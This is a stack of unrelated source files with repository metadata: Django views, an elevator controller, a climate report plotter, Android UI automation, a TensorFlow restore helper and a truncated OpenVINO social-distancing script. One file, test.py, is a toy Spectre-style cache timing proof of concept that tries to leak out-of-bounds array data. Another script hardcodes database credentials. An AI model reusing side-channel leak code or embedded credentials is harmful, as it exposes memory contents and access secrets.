/accounts/views.py
|
1bb00dd8fc5b783dcb4ed53f80f01dfd1ab89462
|
[] |
no_license
|
progmenEugene/Yowithpro
|
df186975b7a49208c5603b20a876e11cdc924d21
|
26b1fa8ed166feee699546b463dd4a38b3d39d81
|
refs/heads/master
| 2020-04-02T18:38:35.561621
| 2018-10-25T17:01:45
| 2018-10-25T17:01:45
| 154,707,662
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 4,737
|
py
|
from django.shortcuts import render
from django.shortcuts import render
from django import forms
# Create your views here.
from django.contrib.auth.forms import PasswordResetForm
from django.shortcuts import redirect
from django.views.generic import CreateView
from django.contrib import messages
from .forms import RegistrationForm, TeacherProfileUpdateForm, UserUpdateForm
from .models import User, TeacherProfile, VideoLink
from django.views.generic import TemplateView, ListView, DetailView, CreateView, UpdateView, DeleteView
from django.contrib.auth.mixins import LoginRequiredMixin, UserPassesTestMixin
from django.contrib.auth.decorators import login_required
def home(request):
return render(request, 'home.html')
class SignUpView(TemplateView):
template_name = 'registration/signup.html'
class RegistrationView(CreateView):
template_name = 'accounts/user_form.html'
form_class = RegistrationForm
success_url = 'accounts:register-done'
model = User
def form_valid(self, form):
obj = form.save(commit=False)
obj.set_password(User.objects.make_random_password())
obj.is_active = True # PasswordResetForm won't send to inactive users.
obj.save()
# This form only requires the "email" field, so will validate.
reset_form = PasswordResetForm(self.request.POST)
reset_form.is_valid() # Must trigger validation
# Copied from django/contrib/auth/views.py : password_reset
opts = {
#'use_https': self.request.is_secure(),
'email_template_name': 'registration/verification.html',
'subject_template_name': 'registration/verification_subject.txt',
'request': self.request,
# 'html_email_template_name': provide an HTML content template if you desire.
}
# This form sends the email on save()
reset_form.save(**opts)
return redirect('register-done')
# profile view for teacher and maybe for buyer
@login_required
def profile(request):
if request.method == 'POST':
u_form = UserUpdateForm(request.POST, instance=request.user)
p_form = TeacherProfileUpdateForm(request.POST,
request.FILES,
instance=request.user.profile)
if u_form.is_valid() and p_form.is_valid():
u_form.save()
p_form.save()
TeacherProfile.objects.create(**{
'name' : 'name', 'city': 'city', 'club': 'club', 'url_link': 'url.com', 'desctiption': 'desc'
})
messages.success(request, 'Your account has been updated!')
return redirect('profile')
else:
u_form = UserUpdateForm(instance=request.user)
p_form = TeacherProfileUpdateForm(instance=request.user.profile)
context = {
'u_form': u_form,
'p_form': p_form
}
return render(request, 'accounts/profile.html', context)
#Videos links view
def videolink(request):
context = {'videos': VideoLink.objects.all()}
return render(request, 'accounts/videolink.html')
#Add video links for teacher profile
class VideoLinksView(ListView):
model = VideoLink
template_name = 'accounts/videolink.html'
#<app>/<model>_<viewstype>
context_object_name = 'videos'
ordering = ['-pub_date']
class VideoDetailView(DetailView):
model = VideoLink
template_name = 'accounts/videolink_detail.html'
class DateInput(forms.DateInput):
input_type = 'date'
class VideoCreateView(LoginRequiredMixin, CreateView):
model = VideoLink
template_name = 'accounts/videolink_form.html'
fields = ['title','title_image', 'link_url', 'pub_date', 'short_description']
def form_valid(self, form):
form.instance.teacher = self.request.user
return super().form_valid(form)
class VideoUpdateView(LoginRequiredMixin, UserPassesTestMixin, UpdateView):
model = VideoLink
fields = ['title', 'title_image', 'link_url', 'pub_date', 'short_description']
template_name = 'accounts/videolink_form.html'
def form_valid(self, form):
form.instance.teacher = self.request.user
return super().form_valid(form)
def test_func(self):
video = self.get_object()
if self.request.user == video.teacher:
return True
return False
class VideoDeleteView(LoginRequiredMixin, UserPassesTestMixin, DeleteView):
model = VideoLink
success_url = '/'
template_name = 'accounts/videolink_confirm_delete.html'
def test_func(self):
video = self.get_object()
if self.request.user == video.teacher:
return True
return False
|
[
"ecompx@gmail.com"
] |
ecompx@gmail.com
|
0f8f7522464a74d1b19a0325fe6df93394c0064f
|
ad8939b540fd50ca47df2b6c70d9548646dea7ad
|
/elevatorController.py
|
4880381f07f02f3868e5a5e827ab22cda6bd326a
|
[] |
no_license
|
MohitHasija/Elevator
|
30c27efdedd8001c71f31db8bad6b22398e2e9c9
|
a2158e40b4681faf53164915af0c37c98b392411
|
refs/heads/master
| 2021-03-28T04:43:57.404903
| 2020-03-16T23:52:47
| 2020-03-16T23:52:47
| 247,837,625
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,798
|
py
|
from copy import copy
class ElevatorController(object):
def __init__(self, elevator):
# An unordered set of floor numbers that have been requested
self.requested_floors = set()
# An ordered list of floors that have been visited
self.visited_floors = []
# Number of floors traveled since the elevator was started
self.num_floors_traveled = 0
# current number of floor
self.current_floor = elevator.current_floor
# total number of eccessible floors by elevator
self.num_floors = elevator.num_floors
# Registers a request to visit a specific floor
def validate_floor_call(self, floor):
# This condition excludes negative and out of range floor values.
return floor >= 0 and floor <= self.num_floors
def request_floor_from_inside(self, floor):
# This condition excludes negative and out of range floor values.
if self.validate_floor_call(floor) and floor != self.current_floor:
self.requested_floors.add(floor)
def request_floor(self,current_floor, floor):
if current_floor != floor and self.validate_floor_call(floor):
self.requested_floors.add(floor)
if current_floor != self.current_floor:
self.requested_floors.add(current_floor)
# Computes number of floors passed when traveling from the current floor to
# the given floor (including the given floor itself)
def get_floor_difference(self, floor):
return abs(self.current_floor - floor)
# Travels to the given floor to pick up or drop off passengers
def visit_floor(self, floor):
self.num_floors_traveled += self.get_floor_difference(floor)
self.current_floor = floor
self.visited_floors.append(self.current_floor)
# discard() will not raise an exception if floor does not exist
self.requested_floors.discard(self.current_floor)
# Starts elevator and travels computed route according to current requests
def travel(self):
# Visit next closest requested floor until all requested floors have
# been visited
print("The floors to visit are:", self.requested_floors)
while len(self.requested_floors) != 0:
closest_floor = min(
self.requested_floors, key=self.get_floor_difference)
floor_to_visit = closest_floor
if floor_to_visit == self.current_floor:
copy_of_requested_floors = copy(self.requested_floors)
copy_of_requested_floors.discard(self.current_floor)
floor_to_visit = min(copy_of_requested_floors, key=self.get_floor_difference)
print("The floor to visit is:", floor_to_visit)
self.visit_floor(floor_to_visit)
|
[
"noreply@github.com"
] |
MohitHasija.noreply@github.com
|
5c8a45629c42a37606e1aca5b46aa155f01e6fe9
|
73788c28a6c9742f0e7b4ee99ac4a7f854f40611
|
/htdocs/plotting/auto/scripts100/p123.py
|
d4ec82a54a6e8952157960bce7110f06cf8fa756
|
[] |
no_license
|
nbackas/iem
|
b8c7a356c68865a66b808962e1f09460b74df73f
|
d22e6d7b1b94db3bb081fb08619f83fb5b6784b7
|
refs/heads/master
| 2020-12-31T03:04:22.144156
| 2016-03-21T19:09:16
| 2016-03-21T19:09:16
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,071
|
py
|
import psycopg2
from pyiem.network import Table as NetworkTable
from pandas.io.sql import read_sql
import datetime
import numpy as np
def get_description():
""" Return a dict describing how to call this plotter """
d = dict()
d['data'] = True
d['report'] = True
d['description'] = """ """
d['arguments'] = [
dict(type='station', name='station', default='IA2203',
label='Select Station'),
]
return d
def wrap(cnt, s=None):
if cnt > 0:
return s or cnt
else:
return ""
def contiguous_regions(condition):
# http://stackoverflow.com/questions/4494404
"""Finds contiguous True regions of the boolean array "condition". Returns
a 2D array where the first column is the start index of the region and the
second column is the end index."""
# Find the indicies of changes in "condition"
# d = np.diff(condition)
d = np.subtract(condition[1:], condition[:-1], dtype=np.float)
idx, = d.nonzero()
# We need to start things after the change in "condition". Therefore,
# we'll shift the index by 1 to the right.
idx += 1
if condition[0]:
# If the start of condition is True prepend a 0
idx = np.r_[0, idx]
if condition[-1]:
# If the end of condition is True, append the length of the array
idx = np.r_[idx, condition.size] # Edit
# Reshape the result into two columns
idx.shape = (-1, 2)
return idx
def plotter(fdict):
""" Go """
import matplotlib
matplotlib.use('agg')
pgconn = psycopg2.connect(database='coop', host='iemdb', user='nobody')
cursor = pgconn.cursor()
station = fdict.get('station', 'IA0200')
table = "alldata_%s" % (station[:2], )
nt = NetworkTable("%sCLIMATE" % (station[:2], ))
res = """\
# IEM Climodat http://mesonet.agron.iastate.edu/climodat/
# Report Generated: %s
# Climate Record: %s -> %s
# Site Information: [%s] %s
# Contact Information: Daryl Herzmann akrherz@iastate.edu 515.294.5978
# First occurance of record consecutive number of days
# above or below a temperature threshold
""" % (datetime.date.today().strftime("%d %b %Y"),
nt.sts[station]['archive_begin'].date(), datetime.date.today(), station,
nt.sts[station]['name'])
res += "# %-27s %-27s %-27s %-27s\n" % (" Low Cooler Than",
" Low Warmer Than",
" High Cooler Than",
" High Warmer Than")
res += "%3s %5s %10s %10s %5s %10s %10s %5s %10s %10s %5s %10s %10s\n" % (
'TMP', 'DAYS', 'BEGIN DATE', 'END DATE',
'DAYS', 'BEGIN DATE', 'END DATE',
'DAYS', 'BEGIN DATE', 'END DATE',
'DAYS', 'BEGIN DATE', 'END DATE')
cursor.execute("""SELECT high, low from """+table+"""
WHERE station = %s and day >= '1900-01-01' ORDER by day ASC
""", (station, ))
highs = np.zeros((cursor.rowcount,), 'f')
lows = np.zeros((cursor.rowcount,), 'f')
for i, row in enumerate(cursor):
highs[i] = row[0]
lows[i] = row[1]
startyear = max([1900, nt.sts[station]['archive_begin'].year])
for thres in range(-20, 101, 2):
condition = lows < thres
max_bl = 0
max_bl_ts = datetime.date.today()
for start, stop in contiguous_regions(condition):
if (stop - start) > max_bl:
max_bl = int(stop - start)
max_bl_ts = datetime.date(startyear,
1, 1) + datetime.timedelta(
days=int(stop))
condition = lows >= thres
max_al = 0
max_al_ts = datetime.date.today()
for start, stop in contiguous_regions(condition):
if (stop - start) > max_al:
max_al = int(stop - start)
max_al_ts = datetime.date(startyear,
1, 1) + datetime.timedelta(days=int(stop))
condition = highs < thres
max_bh = 0
max_bh_ts = datetime.date.today()
for start, stop in contiguous_regions(condition):
if (stop - start) > max_bh:
max_bh = int(stop - start)
max_bh_ts = datetime.date(startyear,
1, 1) + datetime.timedelta(days=int(stop))
condition = highs >= thres
max_ah = 0
max_ah_ts = datetime.date.today()
for start, stop in contiguous_regions(condition):
if (stop - start) > max_ah:
max_ah = int(stop - start)
max_ah_ts = datetime.date(startyear,
1, 1) + datetime.timedelta(
days=int(stop))
res += ("%3i %5s %10s %10s %5s %10s %10s "
"%5s %10s %10s %5s %10s %10s\n"
) % (thres,
wrap(max_bl),
wrap(max_bl, (max_bl_ts -
datetime.timedelta(days=max_bl)).strftime("%m/%d/%Y")),
wrap(max_bl, max_bl_ts.strftime("%m/%d/%Y") ),
wrap(max_al),
wrap(max_al, (max_al_ts -
datetime.timedelta(days=max_al)).strftime("%m/%d/%Y")),
wrap(max_al, max_al_ts.strftime("%m/%d/%Y") ),
wrap(max_bh),
wrap(max_bh, (max_bh_ts -
datetime.timedelta(days=max_bh)).strftime("%m/%d/%Y")),
wrap(max_bh, max_bh_ts.strftime("%m/%d/%Y") ),
wrap(max_ah),
wrap(max_ah, (max_ah_ts -
datetime.timedelta(days=max_ah)).strftime("%m/%d/%Y")),
wrap(max_ah, max_ah_ts.strftime("%m/%d/%Y")))
return None, None, res
if __name__ == '__main__':
plotter(dict())
|
[
"akrherz@iastate.edu"
] |
akrherz@iastate.edu
|
2d159e24ba80c94043bcb9a70bb40d4b96fdcecb
|
249f85611a80ae84dcab037072918f9822335e29
|
/venv/bin/pycodestyle
|
b4d483c96fdb2863f603194c4d145e09aa612b4e
|
[] |
no_license
|
bharathjinka09/bharath-shop
|
06b110c740fbb27b7e759b30c0ca1971dfb8b7be
|
09683c1dbc2e9bc3b2795d2e53252e04b911069d
|
refs/heads/master
| 2022-12-02T03:01:03.347749
| 2020-08-18T06:59:17
| 2020-08-18T06:59:17
| 288,379,827
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 253
|
#!/home/mieone/Downloads/bharath-shop/venv/bin/python3.7
# -*- coding: utf-8 -*-
import re
import sys
from pycodestyle import _main
if __name__ == '__main__':
sys.argv[0] = re.sub(r'(-script\.pyw?|\.exe)?$', '', sys.argv[0])
sys.exit(_main())
|
[
"bharathjinka09@gmail.com"
] |
bharathjinka09@gmail.com
|
|
62b0191ac1f15c6d995aef12697f424b29a02230
|
33ce3289835670440bf1ae43ea11752c1fd50f1c
|
/examples/settings-sound-phone_ringtone.py
|
03d9bc99214bcfc2fa39eda97648244896370354
|
[
"Apache-2.0"
] |
permissive
|
fknight3/AndroidViewClient
|
66a1476dd2c5981bc24f2e76fa77f0e2a619cc60
|
2bb7d970153ef5b3c97a11cd13695bce473b0053
|
refs/heads/master
| 2020-03-30T20:53:57.024955
| 2018-10-04T17:30:02
| 2018-10-04T17:30:02
| 151,608,962
| 0
| 0
|
Apache-2.0
| 2018-10-04T17:17:26
| 2018-10-04T17:17:26
| null |
UTF-8
|
Python
| false
| false
| 2,034
|
py
|
#! /usr/bin/env python
'''
Copyright (C) 2012 Diego Torres Milano
Created on Sep 8, 2012
@author: diego
@see: http://code.google.com/p/android/issues/detail?id=36544
'''
import re
import sys
import os
# This must be imported before MonkeyRunner and MonkeyDevice,
# otherwise the import fails.
# PyDev sets PYTHONPATH, use it
try:
for p in os.environ['PYTHONPATH'].split(':'):
if not p in sys.path:
sys.path.append(p)
except:
pass
try:
sys.path.append(os.path.join(os.environ['ANDROID_VIEW_CLIENT_HOME'], 'src'))
except:
pass
from androidviewclient3.viewclient import ViewClient, View
device, serialno = ViewClient.connectToDeviceOrExit()
DEBUG = True
FLAG_ACTIVITY_NEW_TASK = 0x10000000
# We are not using Settings as the bug describes because there's no WiFi dialog in emulator
componentName = 'com.android.settings/.Settings'
device.startActivity(component=componentName, flags=FLAG_ACTIVITY_NEW_TASK)
ViewClient.sleep(3)
vc = ViewClient(device=device, serialno=serialno)
if DEBUG: vc.traverse(transform=ViewClient.TRAVERSE_CIT)
sound = vc.findViewWithText('Sound')
if sound:
sound.touch()
vc.dump()
phoneRingtone = vc.findViewWithText('Phone ringtone')
if phoneRingtone:
phoneRingtone.touch()
vc.dump()
vespa = vc.findViewWithText('Vespa')
if vespa:
vespa.touch()
ViewClient.sleep(1)
ok = vc.findViewById('id/button1')
if ok:
ok.touch()
vc.dump()
vespa = vc.findViewWithText('Vespa')
# If for some reason the dialog is still there we will have Vespa and OK
ok = vc.findViewById('id/button1')
if vespa and not ok:
print("OK")
else:
print("FAIL to set ringtone Vespa")
sys.exit(1)
else:
print("'OK' not found", file=sys.stderr)
else:
print("'Phone ringtone' not found", file=sys.stderr)
else:
print("'Sound' not found", file=sys.stderr)
|
[
"info@bojanpotocnik.com"
] |
info@bojanpotocnik.com
|
428db1642996487e7b9b0f6c10ead23b07ea7d2f
|
64cd7a8be396ff3f9d4c1284d495ca5fc3bd30b8
|
/gae/handlers/registrations.py
|
d6d16dbd04916c304150edad22f156ecf3647bdc
|
[] |
no_license
|
andrefreitas/learning
|
19aadb4842030e739c8daa9dc7fc1a77aa66649e
|
44bdca0b5c71b2813b6aa4c3cfcf3ff11a7cb5d1
|
refs/heads/master
| 2020-05-30T14:45:05.219696
| 2015-09-24T22:04:30
| 2015-09-24T22:04:30
| 34,902,089
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 602
|
py
|
import webapp2
from models import *
from views import template
class RegistrationsHandler(webapp2.RequestHandler):
def post(self):
name = self.request.get('name')
email = self.request.get('email')
course = self.request.get('course')
r = Registration(name=name, email=email, course=course)
r.put()
self.response.write(template('confirmation.html'))
def get(self):
registrations = Registration.all()
template_values = {"registrations": registrations}
self.response.write(template('registrations.html', template_values))
|
[
"p.andrefreitas@gmail.com"
] |
p.andrefreitas@gmail.com
|
b72f0285fc8fa50ebaee4beadd95c015d4f60e27
|
895d1a33771c7b2d8678d585ad3964173542a251
|
/combined_dataset/combined_dataset.py
|
891a6932875a3ddf626c320037d53489d11f2489
|
[] |
no_license
|
StrangeCloud9/NameDis
|
f905dab2fc919c4eed44d4c1591bd6d17593c33b
|
ec50586f4d88c423ddbaf1c4f3bb7d2d94c30d4b
|
refs/heads/master
| 2021-01-23T08:49:06.184932
| 2017-09-06T08:47:58
| 2017-09-06T08:47:58
| 102,555,363
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 6,606
|
py
|
# coding:utf-8
import os
from lxml import html
import re
import pymysql as MySQLdb
import random
conn = MySQLdb.connect(host='202.120.36.29', port=6033, user='groupleader', passwd='onlyleaders', db='mag-new-160205',
charset="utf8")
cursor = conn.cursor()
class Paper:
def __init__(self, paper_id, title, year, venue_id, affiliation_id, coauthors, label, author):
self.paper_id = paper_id
self.title = title
self.year = year
self.venue_id = venue_id
self.affiliation_id = affiliation_id
self.coauthors = coauthors
self.label = label
self.label_predicted = 0
self.author = author
def get_file_list(dir, file_list):
newDir = dir
if os.path.isfile(dir):
file_list.append(dir.decode('gbk'))
elif os.path.isdir(dir):
for s in os.listdir(dir):
# if s == "xxx":
# continue
newDir = os.path.join(dir, s)
get_file_list(newDir, file_list)
return file_list
def generate_paper_instance_list(file):
author_name = file.split('\\')[-1].replace('.xml', '')
author_name = author_name.lower()
author_name = re.sub('[^A-Za-z0-9]', ' ', author_name)
author_name = re.sub('\s{2,}', ' ', author_name)
tree = html.parse(file)
root = tree.getroot()
paper_instance_list = list()
for node in root.xpath('//publication'):
label = node.xpath('label')[0].text
title = node.xpath('title')[0].text
title = title.lower()
if title[-1] == '.':
title = title[:-1]
title = re.sub('[^A-Za-z0-9]', ' ', title)
title = re.sub('\s{2,}', ' ', title)
quest_paper_by_title = 'SELECT PaperID FROM Papers WHERE NormalizedPaperTitle="%s"'
cursor.execute(quest_paper_by_title % title)
ps = cursor.fetchall()
paper_ids = list()
if len(ps) == 1:
paper_ids.append(ps[0][0])
if len(ps) >= 2:
for p in ps:
quest_author_by_paper = 'SELECT AuthorName FROM Authors INNER JOIN' \
' (SELECT AuthorID FROM PaperAuthorAffiliations AS PAA WHERE PaperID="%s") AS TB2' \
' ON Authors.AuthorID = TB2.AuthorID'
cursor.execute(quest_author_by_paper % p[0])
authors = cursor.fetchall()
for author in authors:
if author[0] == author_name.lower():
paper_ids.append(p[0])
for paper_id in paper_ids:
# get affiliation and coauthors
quest_affiliation = 'SELECT AuthorName,AffiliationID FROM Authors INNER JOIN' \
' (SELECT AuthorID,AffiliationID FROM PaperAuthorAffiliations WHERE PaperID="%s") AS TB ' \
'ON Authors.AuthorID = TB.AuthorID'
cursor.execute(quest_affiliation % paper_id)
author_affiliations = cursor.fetchall()
himself = None
for ai in range(len(author_affiliations)):
if author_affiliations[ai][0] == author_name.lower():
himself = ai
break
if himself is None:
tmp1 = author_name.split()
for ai in range(len(author_affiliations)):
tmp2 = author_affiliations[ai][0].split()
if tmp1[-1] == tmp2[-1] and tmp1[0][0] == tmp2[0][0]:
himself = ai
break
elif tmp1[-1] == tmp2[0] and tmp1[0][0] == tmp2[-1][0]:
himself = ai
break
# get affiliation
if himself is None:
affiliation_id = author_affiliations[-1][1]
else:
affiliation_id = author_affiliations[himself][1]
# get coauthors
coauthors = set()
for ai in range(len(author_affiliations)):
if ai != himself:
coauthor_name = author_affiliations[ai][0]
coauthors.add(coauthor_name)
# get venue, title and year
venue_id = None
year = None
quest_info_by_paper = 'SELECT NormalizedPaperTitle, ConferenceSeriesIDMappedToVenueName, ' \
'JournalIDMappedToVenueName, PaperPublishYear FROM Papers WHERE PaperID = "%s"'
cursor.execute(quest_info_by_paper % paper_id)
rs = cursor.fetchall()
if len(rs) != 0:
# fill in paper_venue_dict
if rs[0][1] is not None:
venue_id = rs[0][1]
elif rs[0][2] is not None:
venue_id = rs[0][2]
year = rs[0][3]
paper_instance = Paper(paper_id, title, year, venue_id, affiliation_id, coauthors, label, author_name)
paper_instance_list.append(paper_instance)
return paper_instance_list
if __name__ == '__main__':
file_list = get_file_list('./tj_dataset', [])
avg_pairwise_precision = 0.0
avg_pairwise_recall = 0.0
avg_pairwise_f1 = 0.0
# file_list = ['./tj_dataset/Keith Edwards.xml']
for file in file_list:
full_similarity_dict = dict()
all_papers = generate_paper_instance_list(file)
f_name = file+".txt"
f_name = f_name.replace(".xml","")
f_name =f_name.replace(" ","")
File = open(f_name,"a")
cnt = 0
for paper in all_papers:
#print (paper.paper_id)
#print (paper.title)
#print (paper.year)
#print (paper.venue_id)
#print (paper.affiliation_id)
#print (paper.coauthors)
#print (paper.author)
t = ""
for n in paper.coauthors:
t+=n
t+=","
t = t[:-1]
t.encode('utf8')
if(paper.venue_id == None):
paper.venue_id = str(random.randint(1,2000000))
if(paper.affiliation_id == None):
paper.affiliation_id = str(random.randint(1,20000))
#print (str(cnt)+";"+str(paper.label)+";"+paper.author+";"+t+str(paper.title)+";"+str(paper.venue_id)+";"+str(paper.year)+"\n")
File.write(str(cnt)+";"+str(paper.label)+";"+paper.author.encode("utf-8")+";"+t.encode("utf8")+";"+str(paper.title)+";"+str(paper.affiliation_id)+";"+str(paper.venue_id)+";"+str(paper.year)+"\n")
cnt+=1
File.close()
|
[
"326902993@qq.com"
] |
326902993@qq.com
|
e84a546a9eb69ba590b9d78efab3999ecec10f66
|
743305c980318628b80b972fd467fe099379988c
|
/Modulos/Academica/views.py
|
ed05b65fe5ade8d9ebb03c42af1e6fe82318bad9
|
[] |
no_license
|
Johang74/Gestion-Universidad-Basico
|
7ff02a8b083feca989630c8ce2e1b835bb797936
|
d63b68dad0962c419aeadd50cc542003424a7487
|
refs/heads/master
| 2022-11-17T07:12:33.551184
| 2020-07-18T17:58:20
| 2020-07-18T17:58:20
| 280,685,298
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 169
|
py
|
from django.shortcuts import render
# Create your views here.
def formulario(request):
return render(request, 'formulario.html')
def contactar(request):
pass
|
[
"johang0297@gmail.com"
] |
johang0297@gmail.com
|
b069607cd616397c9afb35f5f17d3d06dbaa218e
|
4d8d1b72b531073265d5697a07a019ce55f70547
|
/restore_model.py
|
38ac66e5a67c9a21c6811eb4c0eed3a9b718f388
|
[] |
no_license
|
yjy0625/pix2pix-tf
|
75feb18b917c1fe108412b4476f2193c15fc3cec
|
79073ff8ed4c2d0b803746eae4d497523e66ebf1
|
refs/heads/master
| 2020-03-28T08:53:08.619814
| 2019-02-06T18:40:28
| 2019-02-06T18:40:28
| 147,996,323
| 1
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 807
|
py
|
import tensorflow as tf
import tensorflow.contrib.slim as slim
import os
def get_restorer(FLAGS):
checkpoint_dir_path = os.path.join('./', FLAGS.checkpoint_dir, FLAGS.version)
checkpoint_path = tf.train.latest_checkpoint(checkpoint_dir_path)
restorer = None
if checkpoint_path != None:
if FLAGS.restore:
print('----- Restoring from Model -----')
model_variables = slim.get_model_variables()
restorer = tf.train.Saver(model_variables)
else:
restorer = tf.train.Saver()
print("Model restored from :", checkpoint_path)
else:
if not os.path.exists(checkpoint_dir_path):
os.makedirs(checkpoint_dir_path)
print("Model not found. Training from scratch.")
return restorer, checkpoint_path
|
[
"jingyuny@usc.edu"
] |
jingyuny@usc.edu
|
d6d8f63f4cda415d7c624e8325d5a901be794395
|
ca7aa979e7059467e158830b76673f5b77a0f5a3
|
/Python_codes/p03399/s953862554.py
|
bc9df3aeb190f77d1e5da24f3410b5437cd2a8a6
|
[] |
no_license
|
Aasthaengg/IBMdataset
|
7abb6cbcc4fb03ef5ca68ac64ba460c4a64f8901
|
f33f1c5c3b16d0ea8d1f5a7d479ad288bb3f48d8
|
refs/heads/main
| 2023-04-22T10:22:44.763102
| 2021-05-13T17:27:22
| 2021-05-13T17:27:22
| 367,112,348
| 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 164
|
py
|
def main():
A = int(input())
B = int(input())
C = int(input())
D = int(input())
print(min(A, B)+min(C, D))
if __name__ == "__main__":
main()
|
[
"66529651+Aastha2104@users.noreply.github.com"
] |
66529651+Aastha2104@users.noreply.github.com
|
d09fd5269e5e9a371ba79ad2612ea62ed9b72c02
|
0abb9d8b66e110b1439ea53fc63ef482465fef71
|
/dbmgr/migrations/0004_auto_20180206_1513.py
|
cf9e3cd2e3d8616a5011bfb5741135716fc9b9c3
|
[] |
no_license
|
sohjunjie/ntu-ureca-us-stock-prediction
|
6bfea7adefabf6a6a60d952675ec2e6f6b361fe5
|
4caa6acd94560b15a632374b116c4e4109e7fded
|
refs/heads/master
| 2020-03-27T21:35:41.155542
| 2018-09-03T06:19:57
| 2018-09-03T06:19:57
| 147,159,695
| 0
| 2
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 459
|
py
|
# -*- coding: utf-8 -*-
# Generated by Django 1.11.5 on 2018-02-06 15:13
from __future__ import unicode_literals
from django.db import migrations, models
class Migration(migrations.Migration):
dependencies = [
('dbmgr', '0003_newspaperfeed'),
]
operations = [
migrations.AlterField(
model_name='ustwitternewsfeed',
name='feedid',
field=models.BigIntegerField(unique=True),
),
]
|
[
"junjie.soh93@gmail.com"
] |
junjie.soh93@gmail.com
|
0b1452ebc0f8f166f42bd1488e7d2622af0c014c
|
b1984d708438c465b2f4a4be09a2ba8861d8e042
|
/test.py
|
54ad6a894b7e2ffa1cdf3d6a3b9912eaba7a778c
|
[] |
no_license
|
marktsai0316/tests
|
176878cc4dca49324e0e5f5ba04da96f1518cec0
|
65d80564e1565efb197543010a591ac747b8427a
|
refs/heads/master
| 2023-04-21T05:24:12.903376
| 2019-06-05T21:19:25
| 2019-06-05T21:19:25
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 2,509
|
py
|
#!/usr/bin/python
import time
from ctypes import *
from operator import itemgetter
page_size = 4096
eviction_len= 8*1024*1024
probe_len = 8192 * page_size # assure every of the 256 accessed addresses gets an own page
c_lines = 12 # count cache lies
s_lines = 64 # size per cache line
c_sets = 8192 # count cache sets
hit_treshold = 1.25 # treshold to distinguish cache hit from miss (miss takes 1.15 time as long to read)
# note on treshold: based on tests, includes operation delay, trimmed to pure "read and store" (no xor etc.)
step_shift = 12
arr_step = 1<<step_shift
arr_size = arr_step<<13
probebuf = bytearray(probe_len)
evictbuf = bytearray(eviction_len)
x_len = 16
x_arr = bytearray(20)
for i in range(len(x_arr)):
x_arr[i] = i
def victim_function(x):
#print("Accessing idx {0} of test array (=value)".format(x))
# access probe array based on result of x_arr access
if (x < x_len):
a = probebuf[x_arr[x] * page_size]
def evict_cache():
a = 0
step = 64
for i in range(0, len(evictbuf), step):
a = evictbuf[i]
def read_idx(idx):
addr=idx*page_size
# measure read
start = time.perf_counter()
a = probebuf[addr]
elapsed = time.perf_counter() - start
#print("read idx {0}: {1:.12f} seconds".format(idx ,elapsed))
return elapsed
time.perf_counter()
# fill evictbuf
print("Filling evict buffer, used for cache eviction")
for i in range(len(evictbuf)):
evictbuf[i] = (i%255) + 1
# fill probebuf
print("Filling probe buffer, used to leak values")
for i in range(len(probebuf)):
probebuf[i] = (i%255) + 1
res={}
for i in range(256):
res[i]=0
goodguess=False
attempt=0
while not goodguess:
attempt += 1
# train victim
victim_function(11)
victim_function(1)
victim_function(9)
# flush cache
print("Round {0} ... flush cache".format(attempt))
evict_cache()
##### here's the place to cache an access to the probe array ######
victim_function(15)
# measure read
for probeidx in range(256):
testidx=probeidx
# print("Testing idx {0}".format(testidx))
e1 = read_idx(testidx)
e2 = read_idx(testidx)
if (e1 < e2*hit_treshold):
print("hit {0}".format(testidx))
res[testidx] += 1
# print top5 results
so = sorted(res.items(), key=itemgetter(1), reverse=True)
print(so[:5])
# we abort a soon as the best guess has 2-times as many hits as its successor (minimum 10 hits)
if ((so[0][1] > 20) and (so[0][1] > 2*so[1][1])):
goodguess=True
result=so[0][0]
print("Value estimated after {0} rounds is: {1}".format(attempt, result))
|
[
"mame8282@googlemail.com"
] |
mame8282@googlemail.com
|
f3ab5d2b31cba0edb5e33649760867797e54a5f0
|
05c15f476044624acaf137390bd28c60ae886aa1
|
/socialdistance.py
|
7efd773238059330157451e78a315b63616231d0
|
[
"LicenseRef-scancode-unknown-license-reference",
"BSD-3-Clause"
] |
permissive
|
vineet019/social-distance
|
d55bada7890017178c96f522af9f4c4f8acea98b
|
7b24da1712e0335c4e51520023fa1ec5af6c66f9
|
refs/heads/master
| 2022-12-16T04:33:04.694168
| 2020-09-24T01:52:36
| 2020-09-24T01:52:36
| null | 0
| 0
| null | null | null | null |
UTF-8
|
Python
| false
| false
| 8,553
|
py
|
"""
Copyright (C) 2020 Intel Corporation
SPDX-License-Identifier: BSD-3-Clause
"""
import json
from collections import OrderedDict
from itertools import combinations
import cv2
import os
from libs.draw import Draw
from libs.geodist import social_distance, get_crop
from libs.geometric import get_polygon, get_point, get_line
from libs.person_trackers import PersonTrackers, TrackableObject
from libs.validate import validate
from openvino.inference_engine import IENetwork, IECore
class SocialDistance(object):
def __init__(self):
config_file_path = os.path.join(os.path.dirname(os.path.realpath(__file__)), "config.json")
with open(config_file_path) as f:
cfg = json.load(f)
validate(cfg)
self.running = True
self.videosource = cfg.get("video")
self.model_modelfile = cfg.get("pedestrian_model_weights")
self.model_configfile = cfg.get("pedestrian_model_description")
self.model_modelfile_reid = cfg.get("reidentification_model_weights")
self.model_configfile_reid = cfg.get("reidentification_model_description")
self.coords = cfg.get("coords")
# OPENVINO VARS
self.ov_input_blob = None
self.out_blob = None
self.net = None
self.ov_n = None
self.ov_c = None
self.ov_h = None
self.ov_w = None
self.ov_input_blob_reid = None
self.out_blob_reid = None
self.net_reid = None
self.ov_n_reid = None
self.ov_c_reid = None
self.ov_h_reid = None
self.ov_w_reid = None
# PROCESSOR VARS
self.confidence_threshold = .85
self.iterations = 4 # ~ 5 feets
self.trackers = []
self.max_disappeared = 90
self.polygon = None
self.trackers = PersonTrackers(OrderedDict())
self.min_w = 99999
self.max_w = 1
def load_openvino(self):
try:
ie = IECore()
net = IENetwork.from_ir(model=self.model_configfile, weights=self.model_modelfile)
